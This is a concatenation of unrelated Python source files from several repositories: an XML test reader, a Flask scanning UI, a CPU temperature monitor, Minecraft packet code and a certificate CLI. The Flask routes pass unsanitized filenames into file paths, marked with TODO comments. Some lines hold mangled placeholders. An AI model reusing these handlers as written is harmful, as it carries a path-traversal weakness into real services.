tmp_param = current_container.get_parameter_n(p)
values = ""
for i in range(tmp_param.nb_instances):
values += str(tmp_param.values[i]) + ";"
values = values[:-1]
s += tab + "\t<parameter name=\"" + p + "\" values=\"" + values + "\"/>\n"
for c in current_container.children:
s += write_node(current_container.get_child_n(c), tab + "\t")
return s
def read_test_case(path, root_node):
root_xml = parse_xml(path)
seed = "r"
if root_node.name == root_xml.attrib["name"]:
if root_xml[0].tag == "seed":
if root_xml[0].attrib["value"]:
seed = root_xml[0].attrib["value"]
root_xml.remove(root_xml[0])
else:
misc.error("Xml::read_template() -> seed value is missing")
raise ValueError
else:
misc.error("Xml::read_genotype() -> node name does not match")
raise ValueError
set_element(root_xml, root_node)
return seed
def set_element(node_xml, node, i=0):
for child in node_xml:
name = check_attribute(child, "name", True)
if child.tag == "parameter":
set_parameter(name, child, node, i)
elif child.tag == "node":
set_node(name, child, node, i)
else:
misc.error("Xml::set_element() -> unknown xml tag\"" + child.tag + "\"")
raise NameError
def set_parameter(name, node_xml, node, i):
if name in node.parameters:
param = node.get_parameter_n(name, i)
values = check_attribute(node_xml, "values", True).split(";")
length = len(values)
param.change_nb_instances(length)
for i in range(length):
if not values[i] in ["r", ""]:
param.set_value_i(i, misc.remove_starting_and_ending_space(values[i]))
param.lock_i(i)
else:
misc.error("Xml::set_parameter() -> parameter name \"" + name + "\" does not match")
raise NameError
def set_node(name, node_xml, node, i):
if name in node.children:
elem = node.get_child_n(name, i)
raw_identifier = check_attribute(node_xml, "instance")
if raw_identifier is None:
raw_identifier = "0"
identifier = raw_identifier.split("/")[0]
if misc.check_integer(identifier, True):
identifier = int(identifier)
if "/" in raw_identifier:
max_identifier = raw_identifier.split("/")[1]
if misc.check_integer(max_identifier, True):
max_identifier = int(max_identifier)
if not elem.nb_instances_lock:
elem.change_nb_instances(max_identifier + 1)
elem.lock_nb_instances()
if elem.nb_instances is None or identifier + 1 > elem.nb_instances:
elem.change_nb_instances(identifier + 1)
set_element(node_xml, elem, identifier)
if not elem.nb_instances_lock:
elem.reduce_nb_instances_interval(identifier)
else:
set_element(node_xml, elem, identifier)
``` |
{
"source": "johndoe31415/bulkscan",
"score": 3
} |
#### File: johndoe31415/bulkscan/FriendlyArgumentParser.py
```python
import sys
import argparse
import textwrap
class FriendlyArgumentParser(argparse.ArgumentParser):
def __init__(self, *args, **kwargs):
argparse.ArgumentParser.__init__(self, *args, **kwargs)
self.__silent_error = False
def setsilenterror(self, silenterror):
self.__silent_error = silenterror
def error(self, msg):
if self.__silent_error:
raise Exception(msg)
else:
for line in textwrap.wrap("Error: %s" % (msg), subsequent_indent = " "):
print(line, file = sys.stderr)
print(file = sys.stderr)
self.print_help(file = sys.stderr)
sys.exit(1)
def baseint(value, default_base = 10):
if value.lower().startswith("0x"):
return int(value, 16)
elif value.lower().startswith("0b"):
return int(value, 2)
elif value.lower().startswith("0o"):
return int(value, 8)
elif value.lower().startswith("0b"):
return int(value, 2)
else:
return int(value, default_base)
if __name__ == "__main__":
parser = FriendlyArgumentParser()
parser.add_argument("-d", "--dbfile", metavar = "filename", type = str, default = "mydb.sqlite", help = "Specifies database file to use. Defaults to %(default)s.")
parser.add_argument("-f", "--force", action = "store_true", help = "Do not ask for confirmation")
parser.add_argument("-x", metavar = "hexint", type = baseint, default = "0x100", help = "Defaults to %(default)s.")
parser.add_argument("qids", metavar = "qid", type = int, nargs = "+", help = "Question ID(s) of the question(s) to be edited")
args = parser.parse_args(sys.argv[1:])
print(args)
```
#### File: bulkscan/scanui/Controller.py
```python
import os
import time
import re
import json
import uuid
import subprocess
import contextlib
import tempfile
import shutil
import doclib
import datetime
from .AutocompleteDB import AutocompleteDB
class Controller():
def __init__(self, app):
self._app = app
self._config = None
self._basedir = os.path.dirname(__file__)
self._acdb = None
self._doclib = doclib.DocLibrary()
def _late_init(self):
# Now config is available
with contextlib.suppress(FileExistsError):
os.makedirs(self._config["thumb_dir"])
with contextlib.suppress(FileExistsError):
os.makedirs(self._config["trash_dir"])
with contextlib.suppress(FileExistsError):
os.makedirs(self._config["doc_dir"])
with contextlib.suppress(FileExistsError):
os.makedirs(self._config["processed_dir"])
self._acdb = AutocompleteDB(self._config["autocomplete_config"])
self._doclib.add_directory(self._config["doc_dir"])
@property
def config(self):
return self._config
@property
def acdb(self):
return self._acdb
def set_config(self, config):
self._config = config
self._late_init()
@property
def staticdir(self):
return self._basedir + "/static"
def list_incoming(self):
incoming_files = [ filename for filename in os.listdir(self._config["incoming_dir"]) if filename.endswith(".png") ]
incoming_files.sort()
return incoming_files
def rotate(self, filename, degrees):
input_filename = self._config["incoming_dir"] + "/" + filename
with tempfile.NamedTemporaryFile(suffix = ".png", delete = False) as outfile:
subprocess.check_call([ "convert", "-rotate", str(degrees), input_filename, outfile.name ])
shutil.move(outfile.name, input_filename)
self.remove_thumb(filename)
@staticmethod
def _sanitize_filename(filename):
filename = filename.replace("/", " ")
filename = filename.replace("\"", " ")
filename = filename.replace("'", " ")
filename = filename.replace("&", "+")
filename = re.sub(r"\s+", "_", filename)
return filename
def _find_filename(self, dirname, filename):
for i in range(1000):
if i == 0:
result_filename = self._sanitize_filename(filename)
else:
(prefix, extension) = os.path.splitext(filename)
result_filename = self._sanitize_filename(prefix + "_%03d" % (i) + extension)
full_filename = dirname + "/" + result_filename
if not os.path.exists(full_filename):
return full_filename
return None
def _delete_file(self, src_filename):
return self._move_file(src_filename, self._config["trash_dir"])
def _move_file(self, src_filename, target_dir):
dst_filename = self._find_filename(target_dir, os.path.basename(src_filename))
if dst_filename is not None:
os.rename(src_filename, dst_filename)
return dst_filename is not None
def delete_incoming(self, filelist):
result = { }
return { filename: self._delete_file(self._config["incoming_dir"] + "/" + filename) for filename in filelist }
def get_thumb_filename_for(self, filename):
thumb_filename = self._config["thumb_dir"] + "/" + filename
if thumb_filename.endswith(".png"):
thumb_filename = thumb_filename[:-3] + "jpg"
return thumb_filename
def remove_thumb(self, filename):
with contextlib.suppress(FileNotFoundError):
os.unlink(self.get_thumb_filename_for(filename))
def get_thumb(self, filename):
thumb_filename = self.get_thumb_filename_for(filename)
if not os.path.isfile(thumb_filename):
src_filename = self._config["incoming_dir"] + "/" + filename
subprocess.check_call([ "convert", "-quality", "80", "-resize", "200x300", src_filename, thumb_filename ])
return os.path.basename(thumb_filename)
def create_document(self, filenames, tags = None, attributes = None):
if tags is None:
tags = [ ]
if attributes is None:
attributes = { }
attributes = { key: value for (key, value) in attributes.items() if (value is not None) }
fn_elements = [ ]
if "docdate" in attributes:
fn_elements.append(attributes["docdate"].split(":")[1])
if "peer" in attributes:
fn_elements.append(attributes["peer"].replace(" ", "_"))
if "docname" in attributes:
fn_elements.append(attributes["docname"].replace(" ", "_"))
self.acdb.put_peer_docname(attributes.get("peer"), attributes.get("docname"))
self.acdb.put_tags(tags)
self.acdb.write()
output_doc = self._find_filename(self._config["doc_dir"], "-".join(fn_elements) + ".mud")
with doclib.MultiDoc(output_doc) as doc:
for filename in filenames:
full_filename = self._config["incoming_dir"] + "/" + filename
try:
meta = doclib.MetaReader(full_filename).read()
except doclib.MetaReaderException:
meta = { }
side_uuid = doc.add(full_filename, side_uuid = meta.get("side_uuid"), sheet_uuid = meta.get("page_uuid"), sheet_side = meta.get("side", "front"))
doc.set_side_property(side_uuid, "orig_filename", filename)
for attribute in [ "batch_uuid", "created_utc", "scanned_page_no" ]:
if attribute in meta:
doc.set_side_property(side_uuid, attribute, str(meta[attribute]))
doc.set_document_property("doc_uuid", str(uuid.uuid4()))
doc.set_document_property("created_utc", datetime.datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%SZ"))
for (key, value) in attributes.items():
doc.set_document_property(key, value)
for tag in tags:
doc.add_tag(tag)
for filename in filenames:
self._move_file(self._config["incoming_dir"] + "/" + filename, self._config["processed_dir"])
return { "success": True }
def list_documents(self):
return { doc_uuid: doc_entry.metadata for (doc_uuid, doc_entry) in self._doclib }
```
#### File: bulkscan/scanui/__init__.py
```python
import os
import json
from flask import Flask, send_file, send_from_directory, jsonify, request, abort, redirect
from .Controller import Controller
from .Debug import Debug
app = Flask(__name__)
ctrlr = Controller(app)
dbg = Debug()
@app.route("/")
def index():
return redirect("/static/html/incoming.html")
@app.route("/incoming/list")
def incoming_list():
return jsonify(ctrlr.list_incoming())
# TODO SANITIZE FILENAME
@app.route("/incoming/thumb/#")
def incoming_thumb(filename):
thumb_filename = ctrlr.get_thumb(filename)
if thumb_filename is None:
# No such file or directory
abort(404)
return send_from_directory(ctrlr.config["thumb_dir"], thumb_filename, cache_timeout = 0)
@app.route("/incoming", methods = [ "DELETE" ])
def incoming_delete():
return jsonify(ctrlr.delete_incoming(request.json))
# TODO SANITIZE FILENAME
@app.route("/incoming/action/<action>/#", methods = [ "POST" ])
def incoming_action(action, filename):
if action == "rot90":
ctrlr.rotate(filename, 90)
elif action == "rot180":
ctrlr.rotate(filename, 180)
elif action == "rot270":
ctrlr.rotate(filename, 270)
else:
abort(400)
return jsonify({ "status": "OK" })
# TODO SANITIZE FILENAME
@app.route("/incoming/image/#")
def incoming_image(filename):
return send_from_directory(ctrlr.config["incoming_dir"], filename, cache_timeout = 0)
@app.route("/autocompletion")
def autocompletion():
return jsonify(ctrlr.acdb.get_all())
@app.route("/document", methods = [ "POST" ])
def document_create():
indata = request.json
return jsonify(ctrlr.create_document(indata["files"], indata["tags"], indata["attrs"]))
@app.route("/document")
def document_list():
return jsonify(ctrlr.list_documents())
@app.route("/debug")
def debug():
return jsonify(dbg.get())
@app.route("/debug/long")
def debug_long():
dbg.long()
return "OK\n"
``` |
{
"source": "johndoe31415/cpumontemp",
"score": 3
} |
#### File: johndoe31415/cpumontemp/cpumontemp.py
```python
import time
import datetime
import subprocess
import sys
class CPUMonitor(object):
_CYCLE_DURATION_SECONDS = 60
_FINAL_DURATION_SECONDS = 60
def __init__(self, sensorname):
self._sensorname = sensorname
self._outfile = None
self._t0 = None
self._workers = [ ]
def _spawn_worker(self):
self._workers.append(subprocess.Popen([ "dd", "if=/dev/urandom", "of=/dev/null", "bs=1M" ], stdout = subprocess.DEVNULL, stderr = subprocess.DEVNULL))
def _kill_workers(self):
while len(self._workers) > 0:
worker = self._workers.pop()
worker.kill()
def _get_cpu_count(self):
with open("/proc/cpuinfo") as f:
text = f.read()
text = text.split("\n")
cpu_cnt = 0
for line in text:
if line.startswith("processor"):
cpu_cnt += 1
return cpu_cnt
def start(self):
try:
with open("logfile.txt", "a") as f:
self._outfile = f
self._print_info()
self._t0 = time.time()
for threadcount in range(self._get_cpu_count() + 1):
self._monitor_seconds(self._CYCLE_DURATION_SECONDS)
self._outfile.flush()
self._spawn_worker()
self._kill_workers()
self._monitor_seconds(self._FINAL_DURATION_SECONDS)
finally:
self._kill_workers()
self._outfile = None
def _print_info(self):
print("# %s UTC, %d CPUs" % (datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S"), self._get_cpu_count()), file = self._outfile)
with open("/proc/cpuinfo") as f:
text = f.read()
text = text.split("\n")
for line in text:
if line == "":
break
print("# %s" % (line), file = self._outfile)
print(file = self._outfile)
temperatures = self._get_temperature()
print("# %d sensor inputs:" % (len(temperatures)), file = self._outfile)
for (sensor_id, (corename, temperature)) in enumerate(temperatures):
print("# Sensor %d: %s (initial %.2f)" % (sensor_id, corename, temperature), file = self._outfile)
def _get_temperature(self):
output = subprocess.check_output([ "sensors", "-u", self._sensorname ]).decode()
corename = None
temperatures = [ ]
for line in output.split("\n"):
if not line.startswith(" "):
corename = line.split(":")[0]
elif line.startswith(" ") and ("_input:" in line):
temperature = float(line.split(": ")[1])
temperatures.append((corename, temperature))
return temperatures
def _monitor_seconds(self, second_count):
for seconds in range(second_count):
t = time.time() - self._t0
temperature = self._get_temperature()
avg_temperature = sum(temp[1] for temp in temperature) / len(temperature)
max_temperature = max(temp[1] for temp in temperature)
temperature_str_display = " ".join("%5.1f" % (temp[1]) for temp in temperature)
temperature_str_log = " ".join("%.3f" % (temp[1]) for temp in temperature)
threadcount = len(self._workers)
print("%3.0f %2d Max %5.1f Avg %5.1f : %s" % (t, threadcount, max_temperature, avg_temperature, temperature_str_display))
print("%.0f %d %.3f %.3f %s" % (t, threadcount, max_temperature, avg_temperature, temperature_str_log), file = self._outfile)
time.sleep(1)
CPUMonitor(sys.argv[1]).start()
``` |
{
"source": "johndoe434/Podrum",
"score": 2
} |
#### File: Podrum/podrum/config.py
```python
import json
import os
class config:
def __init__(self, path: str) -> None:
self.path: str = os.path.abspath(path)
self.data: dict = {}
basename: str = os.path.basename(self.path)
extension: str = basename.rsplit(".")[1].lower()
self.extension: str = extension
if not os.path.isfile(path):
self.save()
if extension == "json":
self.data: dict = json.load(open(path, "rt"))
def save(self) -> None:
if self.extension == "json":
json.dump(self.data, open(self.path, "wt"), indent = 4)
```
#### File: mcbe/packet/start_game_packet.py
```python
from protocol.mcbe.mcbe_protocol_info import mcbe_protocol_info
from protocol.mcbe.packet.mcbe_packet import mcbe_packet
class start_game_packet(mcbe_packet):
def __init__(self, data: bytes = b"", pos: int = 0) -> None:
super().__init__(data, pos)
self.packet_id: int = mcbe_protocol_info.start_game_packet
def decode_payload(self):
pass
def encode_payload(self):
self.write_signed_var_long(self.entity_id)
self.write_var_long(self.entity_runtime_id)
self.write_gamemode(self.player_gamemode)
self.write_vector_3_float(self.spawn)
self.write_vector_2_float(self.rotation)
self.write_signed_var_int(self.seed)
self.write_short_le(self.spawn_biome_type)
self.write_string(self.custom_biome_name)
self.write_signed_var_int(self.dimension)
self.write_signed_var_int(self.generator)
self.write_gamemode(self.world_gamemode)
self.write_signed_var_int(self.difficulty)
self.write_block_coordinates(self.world_spawn)
self.write_byte(self.disable_achivements)
self.write_signed_var_int(self.time)
self.write_signed_var_int(self.edu_offer)
self.write_byte(self.edu_features)
self.write_string(self.edu_product_id)
self.write_float_le(self.rain_level)
self.write_float_le(self.lightning_level)
self.write_bool(self.confirmed_platform_locked)
self.write_bool(self.multiplayer_game)
self.write_bool(self.lan_broadcasting)
self.write_signed_var_int(self.xbox_live_broadcast_mode)
self.write_signed_var_int(self.platform_broadcast_mode)
self.write_bool(self.enable_commands)
self.write_bool(self.require_texture_pack)
self.write_game_rules(self.game_rules)
self.write_experiments(self.experiments)
self.write_bool(self.has_used_experiments)
self.write_bool(self.bonus_chest)
self.write_bool(self.start_map)
self.write_signed_var_int(self.permission_level)
self.write_int_le(self.chunk_tick_range)
self.write_bool(self.locked_behavior_pack)
self.write_bool(self.locked_texture_pack)
self.write_bool(self.from_locked_template)
self.write_bool(self.only_msa_gamer_tags)
self.write_bool(self.from_world_template)
self.write_bool(self.world_template_option_locked)
self.write_bool(self.only_old_villagers)
self.write_string(self.game_version)
self.write_int_le(self.limited_world_width)
self.write_int_le(self.limited_world_height)
self.write_bool(self.new_nether)
self.write_bool(self.experimental_gamplay)
self.write_string(self.level_id)
self.write_string(self.world_name)
self.write_string(self.premium_world_template_id)
self.write_bool(self.trial)
self.write_var_int(self.movement_type)
self.write_signed_var_int(self.movement_rewind_size)
self.write_bool(self.server_authoritative_block_breaking)
self.write_long_le(self.current_tick)
self.write_signed_var_int(self.enchantment_seed)
self.write_var_int(0) # block states length
self.write_var_int(len(self.item_table)) # item table length
for string_id, numeric_id in self.item_table.items():
self.write_string(string_id)
self.write_short_le(numeric_id)
self.write_bool(False)
self.write_string(self.multiplayer_correlation_id)
self.write_bool(self.server_authoritative_inventories)
``` |
{
"source": "johndoe-dev/CertGenerator",
"score": 2
} |
#### File: CertGenerator/certgenerator/cli.py
```python
import click
import json
import callbacks
import decorators
from certificate import Certificate
from tools import Tools, edit_config
tools = Tools()
@click.group(context_settings=dict(help_option_names=['-h', '--help']))
@click.option('-V', '--version', is_flag=True, callback=callbacks.print_version,
expose_value=False, is_eager=True, help="show version and exit")
def main():
"""
A command line tool to create and read CSR and P12
"""
if tools.get_config(section="custom"):
tools.set_options(custom=tools.get_config(section="custom"))
@main.command(short_help="init app")
@decorators.folder_options
@decorators.csv_options
def init(cert_folder, csv_file, yaml):
"""
\b
Create or edit certificate folder and csv file
Add yaml file if not exists (csr.yaml)
\f
:param cert_folder:
:param csv_file:
:param yaml:
:return:
"""
edit_config(cert_folder, csv_file, yaml)
@main.command()
@click.pass_context
@decorators.pass_logger
@click.argument('name', type=str, required=False)
@decorators.global_options("csr")
@decorators.debug_options
def create(logger, ctx, name, config, force, key_size, san, verbose, debug, **subject):
"""
Create a single CSR
\f
:param logger:
:param ctx:
:param name:
:param config:
:param force:
:param key_size:
:param san:
:param verbose:
:param debug:
:param subject:
:return:
"""
tools.set_options(ctx=ctx, config=config, san=san, size=key_size, subject=subject, verbose=verbose, debug=debug)
if name:
tools.set_options(name=str(name))
cert = Certificate(logger=logger, opts=tools.opts)
if 'subject' in tools.opts:
cert.load_subject()
cert.generate_csr(force=force)
@main.command(short_help="Create multiple CSR")
@click.pass_context
@decorators.pass_logger
@decorators.csv_options
@decorators.global_options("csr")
@decorators.debug_options
def create_multiple(logger, ctx, csv_file, config, force, key_size, san, verbose, debug, **subject):
"""
Create multiple certificate using csv file
\f
:param logger:
:param ctx:
:param csv_file:
:param config:
:param force:
:param key_size:
:param san:
:param verbose:
:param debug:
:param subject:
:return:
"""
tools.set_options(ctx=ctx, config=config, san=san, size=key_size, subject=subject, verbose=verbose, debug=debug)
cert = Certificate(logger=logger, opts=tools.opts)
if 'subject' in tools.opts:
cert.load_subject()
if csv_file:
cert.generate_multiple(csv_file=csv_file, force=force)
else:
cert.generate_multiple(force=force)
@main.command(short_help="Create one p12")
@click.pass_context
@decorators.pass_logger
@click.argument('name', type=str)
@click.option('-p', '--pem', type=str)
@click.option('-k', '--key', type=str)
@click.option('-pass', '--password', type=str, hide_input=True, help="Define password, default is '<PASSWORD>'",
default="<PASSWORD>")
@decorators.global_options("p12")
@decorators.debug_options
def create_p12(logger, ctx, name, pem, key, password, config, force, verbose, debug):
"""
\b
Create a simple p12
Need key file and pem file
\f
:param logger:
:param ctx:
:param name:
:param pem:
:param key:
:param password:
:param config:
:param force:
:param verbose:
:param debug:
:return:
"""
tools.set_options(ctx=ctx, config=config, verbose=verbose, debug=debug)
cert = Certificate(logger=logger, opts=tools.opts)
cert.generate_p12(key=key, pem=pem, p12=name, password=password, force=force)
@main.command(short_help="Create multiple p12")
@click.pass_context
@decorators.pass_logger
@decorators.csv_options
@click.option('-p', '--pem-folder', type=str, help="Define pem folder where all the pem are located")
@click.option('-k', '--key-folder', type=str,
help="Define key folder where all the key are located,"
" if not defined, it will search key in certificate folder")
@click.option('-pass', '--password', type=str, hide_input=True, help="Define password, default is '<PASSWORD>'",
default="<PASSWORD>")
@decorators.global_options("p12")
@decorators.debug_options
def create_multiple_p12(logger, ctx, csv_file, pem_folder, key_folder, password, config, force, verbose, debug):
"""
Create multiple p12 using csv file
\f
:param logger:
:param ctx:
:param csv_file:
:param pem_folder:
:param key_folder:
:param password:
:param config:
:param force:
:param verbose:
:param debug:
:return:
"""
tools.set_options(ctx=ctx, config=config, verbose=verbose, debug=debug)
cert = Certificate(logger, opts=tools.opts)
if csv_file:
cert.generate_multiple_p12(csv_file=csv_file, pem_folder=pem_folder,
key_folder=key_folder, password=password, force=force)
else:
cert.generate_multiple_p12(pem_folder=pem_folder, key_folder=key_folder, password=password, force=force)
@main.command()
@click.pass_context
@decorators.pass_logger
@click.argument("path", type=str)
@click.option('-pass', '--password', type=str, hide_input=True, help="password used for create p12")
@click.option('-t', '--plain-text', is_flag=True, help="Display certificate in plain text instead of json")
def read(logger, ctx, path, password, plain_text):
"""
Read csr or p12
\f
:param logger:
:param ctx:
:param path:
:param password:
:param plain_text:
:return:
"""
tools.set_options(ctx=ctx)
cert = Certificate(logger=logger, opts=tools.opts)
click.echo(cert.read(path=path, password=password, plain_text=plain_text))
"""
CONFIG SECTION:
- Read config ini
- edit config ini
"""
@main.group()
def config():
"""
Edit or read config ini
"""
@config.command()
def read():
"""read config ini
"""
app_folder = None
if tools.app_folder_exists():
app_folder = "\n\nApp folder : {p}\n".format(p=tools.app_folder)
list_yaml = json.dumps(tools.read_yaml(), indent=2)
else:
list_yaml = "Create app folder using \"cert init\" or \"cert config edit\" before read or edit yaml file"
click.echo("+++++config.ini+++++\n{c}".format(c=json.dumps(tools.config.get_all(), indent=2)))
if app_folder:
click.echo(app_folder)
click.echo("+++++csr.yaml+++++\n{y}".format(y=list_yaml))
@config.command(short_help="edit app config")
@decorators.folder_options
@decorators.csv_options
def edit(cert_folder, csv_file, yaml):
"""
\b
Create or edit certificate folder and csv file
Add yaml file if not exists (csr.yaml)
\f
:param cert_folder:
:param csv_file:
:param yaml:
:return:
"""
edit_config(cert_folder, csv_file, yaml)
@config.command()
def edit_yaml():
"""
Edit Yaml file
"""
tools.write_yaml()
@config.command(short_help="Delete options")
@click.option("-cert", "--cert-folder", is_flag=True, help="if flag, delete cert path folder from config ini")
@click.option("-csv", "--csv-file", is_flag=True, help="if flag, delete csvfile from config ini")
def delete(cert_folder, csv_file):
"""
Delete option from config ini (csr, p12 and csv path)
\f
:param cert_folder:
:param csv_file:
:return:
"""
_config = tools.get_config()
if not cert_folder and not csv_file:
_config.remove_section(section="custom")
with decorators.RemoveOption(config=_config, option=cert_folder) as o:
if o:
_config.remove_option(section="custom", option="app_folder")
with decorators.RemoveOption(config=_config, option=csv_file) as o:
if o:
_config.remove_option(section="custom", option="csvfile")
if __name__ == "__main__":
main()
```
#### File: CertGenerator/certgenerator/tools.py
```python
import os
import ruamel.yaml
import time
import csv
import logging
import logging.handlers
import click
import platform
import shutil
import subprocess
from codecs import open as c_open
from config import Config
from cert_exceptions import *
here = os.path.abspath(os.path.dirname(__file__))
yaml = ruamel.yaml.YAML()
def edit_config(cert_folder, csv_file, _yaml):
"""
add or edit app folder or/and csv_file or/and yaml
:param cert_folder:
:param csv_file:
:param _yaml:
:return:
"""
tools = Tools()
base_app_folder = tools.app_folder
base_csv_file = tools.config.default_csv_file
if cert_folder:
base_app_folder = cert_folder
try:
tools.add_custom_folder(base_app_folder, "app_folder")
except BadPathException as e:
tools.error(e)
except NoFolderException as e:
tools.error(e)
if csv_file:
base_csv_file = csv_file
else:
try:
base_csv_file = tools.get_config("custom")["csv"]
except KeyError:
pass
except TypeError:
pass
try:
tools.add_csv_file(base_csv_file, "csvfile", ext="csv")
except NoFileException as e:
tools.error(e)
except BadExtensionException as e:
tools.error(e)
if _yaml:
tools.write_yaml()
else:
try:
tools.add_config_file()
except NoFileException as e:
tools.error(e)
except BadExtensionException as e:
tools.error(e)
def get_subject():
fields = ["C", "CN", "ST", "L", "O", "OU", "emailAddress", "san"]
subject = {}
for field in fields:
res = validate_subject(field)
if res == "-" or res == "":
continue
subject[field] = res
return subject
def validate_subject(field):
"""
Validate subject
:param field:
:return:
"""
if field is "C":
c = str(click.prompt("Enter your Country Name (2 letter code) (put \"-\" to keep empty)",
default="US", show_default=True))
if c == "-":
return c
try:
if len(c) != 2:
raise ValueError(c)
else:
return c
except ValueError, e:
click.echo('Incorrect country name given , must be 2 letters code: {}'.format(e))
return validate_subject(field)
elif field is "CN":
return str(
click.prompt("Enter your Common Name (eg, DNS name) (put \"-\" to keep empty)",
default=platform.node(), show_default=True))
elif field is "ST":
return str(click.prompt("Enter your State or Province <full name> (put \"-\" to keep empty)",
default="France", show_default=True))
elif field is "L":
return str(click.prompt("Enter your (Locality Name (eg, city) (put \"-\" to keep empty)",
default="Paris", show_default=True))
elif field is "O":
return str(
click.prompt("Enter your Organization Name (eg, company) (put \"-\" to keep empty)",
default="Enterprise", show_default=True))
elif field is "OU":
return str(click.prompt("Enter your Organizational Unit (eg, section) (put \"-\" to keep empty)",
default="IT", show_default=True))
elif field is "emailAddress":
return str(click.prompt("Enter your email address (put \"-\" to keep empty)",
default="{<EMAIL>".format(n=platform.node()), show_default=True))
elif field is "san":
return str(click.prompt("Enter Subject Alt name (san) separate by space (ex: test.com test2.com ...)"
" (put \"-\" to keep empty)"))
class Tools:
def __init__(self):
self.here = here
self.basedir = os.path.dirname(self.here)
self.opts = Options()
self.config = Config()
self.about = self.get_app_info()
self.documents = os.path.join(os.environ["HOME"], "Documents")
self.app_folder = os.path.join(self.documents, self.get_app_info("__title__"))
self.csv_folder = os.path.join(self.app_folder, "csv")
self.yaml_file = os.path.join(self.app_folder, self.config.yaml_file.split("/")[-1])
self.custom_section = "custom"
# Set cert folder
self.load_config()
@staticmethod
def get_app_info(item=None):
"""
Return app info
:param item:
:return:
"""
about = {}
with c_open(os.path.join(here, "__version__.py"), 'r', 'utf-8') as f:
exec (f.read(), about)
for i in about:
if "__long_description__" in i:
try:
about[i] = open(about[i]).read()
except IOError:
about[i] = ""
if item:
return about[item]
return about
def create_certificate_folder(self):
"""
Create path of certificate folder if not exist
:return:
"""
self.load_config()
self.makedir(self.app_folder)
def load_config(self):
"""
load custom app folder
:return:
"""
try:
if "app_folder" in self.config.get_section(self.custom_section):
self.app_folder = self.config.get(self.custom_section, "app_folder")
self.csv_folder = os.path.join(self.app_folder, "csv")
self.yaml_file = os.path.join(self.app_folder, self.config.yaml_file.split("/")[-1])
except KeyError:
pass
except TypeError:
pass
def get_certificate_folder(self):
"""
Return path of certificate folder and created folder if not exist
:return:
"""
self.create_certificate_folder()
return self.app_folder
def logger_folder(self):
"""create logger folder"""
log = os.path.join(self.get_certificate_folder(), "log")
self.makedir(log)
return log
def get_logger(self):
"""
create and return logger
:return:
"""
default = self.get_config("default")
log_file = os.path.join(self.logger_folder(), default["log_file"])
try:
logger = logging.getLogger('certgen')
handler = logging.handlers.TimedRotatingFileHandler(log_file, when="midnight", backupCount=3)
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.WARNING)
return logger
except AttributeError as err:
self.error("[!] Unable to open log file {f}: {e}\n".format(f=default["log_file"], e=err))
def get_config(self, section=None):
"""
Return Config
:param section:
:return:
"""
if section:
return self.config.get_section(section)
return self.config
def add_custom_folder(self, folder, option):
"""
Add custom folder in config ini
:param folder:
:param option:
:return:
"""
message = "App directory created: {p}".format(p=folder)
if os.path.exists(folder):
if os.path.isdir(folder):
self.config.add(self.custom_section, option, folder)
self.load_config()
message = "App directory selected: {p}".format(p=folder)
else:
raise NoFolderException("path: {p} is not a directory".format(p=folder))
else:
try:
self.makedir(folder)
self.config.add(self.custom_section, option, folder)
self.load_config()
except OSError:
self.error("Impossible to create app folder\n"
"Make sure you spell the path well: {p}".format(p=folder))
self.makedir(self.csv_folder)
click.echo(message)
def add_csv_file(self, _file, option=None, ext="csv"):
"""
Add csv file in config ini and add file in path folder
:param _file:
:param option:
:param ext:
:return:
"""
absolute = True
source = ""
destination = ""
message = ""
if len(_file.split("/")) == 1:
absolute = False
self.load_config()
if absolute:
if os.path.exists(_file) and os.path.isfile(_file):
if self.check_extension(_file, ext):
source = _file
destination = self.csv_folder
message = "copy {s} to {d}"\
.format(s=_file.split('/')[-1], d=os.path.join(self.csv_folder, _file.split('/')[-1]))
else:
raise NoFileException("path: {p} doesn't exist".format(p=_file))
else:
if self.check_extension(_file, ext):
source = self.config.default_csv_file
destination = os.path.join(self.csv_folder, _file.split("/")[-1])
message = "add csv: {f} in app directory: {p}"\
.format(f=_file.split("/")[-1], p=self.csv_folder)
try:
self.copy_file(source, destination, message)
except FileAlreadyExists as e:
click.echo("{e} => file selected".format(e=e))
if option:
self.config.add(self.custom_section, option, _file.split("/")[-1])
def add_config_file(self):
"""
Add config file in path folder
:return:
"""
try:
self.load_config()
source = self.config.yaml_file
destination = self.yaml_file
message = "add yaml: {f} in app directory: {p}".format(f=source.split('/')[-1], p=self.app_folder)
self.copy_file(self.config.yaml_file, destination, message=message)
except FileAlreadyExists as e:
click.echo("{e} => already added".format(e=e))
@staticmethod
def copy_file(source, destination, message=None):
"""
copy file
:param source:
:param destination:
:param message:
:return:
"""
if os.path.isfile(destination):
if not os.path.exists(destination):
pass
else:
raise FileAlreadyExists("file {p} already exists".format(p=destination))
else:
if not os.path.exists(os.path.join(destination, source.split("/")[-1])):
pass
else:
raise FileAlreadyExists("file {p} already exists"
.format(p=os.path.join(destination, source.split("/")[-1])))
shutil.copy2(source, destination)
if message:
click.echo(message)
def create_csv_file(self, _file):
"""
Create csv file
:param _file:
:return:
"""
csv_data = [["serial"], ["1234"]]
if not os.path.exists(_file):
with open(os.path.join(self.csv_folder, _file), 'w') as csv_file:
writer = csv.writer(csv_file)
writer.writerows(csv_data)
@staticmethod
def makedir(path):
"""
Create directory with all rights
:param path:
:return:
"""
if not os.path.exists(path):
os.mkdir(path)
os.chmod(path, 0777)
@staticmethod
def check_extension(_file, ext):
"""
check extension of given file
:param _file:
:param ext:
:return:
"""
file_name, file_ext = os.path.splitext(_file)
if ext in file_ext:
return True
raise BadExtensionException("file {f}: Extension {e} is expected, \"{g}\" given"
.format(f=_file, e=ext, g=file_ext))
def write_yaml(self):
"""
Write yaml in app folder
:return:
"""
yaml_file = os.path.join(self.app_folder, self.config.yaml_file.split("/")[-1])
old_yaml = "{f}_{t}".format(f=yaml_file, t=time.strftime('%Y-%m-%d_%H-%M-%S', time.localtime(time.time())))
if self.app_folder_exists():
if os.path.exists(yaml_file):
click.echo("\nRename {f} to {n_f}".format(f=yaml_file.split("/")[-1], n_f=old_yaml.split("/")[-1]))
os.rename(yaml_file, old_yaml)
click.echo("configure csr.yaml\n")
subject = get_subject()
with open(yaml_file, "w") as f:
yaml.dump(subject, f)
click.echo("\ncsr.yaml has been configured")
else:
self.error("app folder: {p} doesn't exist\nTry \"cert init\" or \"cert config edit\" to create app folder"
.format(p=self.app_folder))
def read_yaml(self):
"""
Read yaml file from app folder
:return:
"""
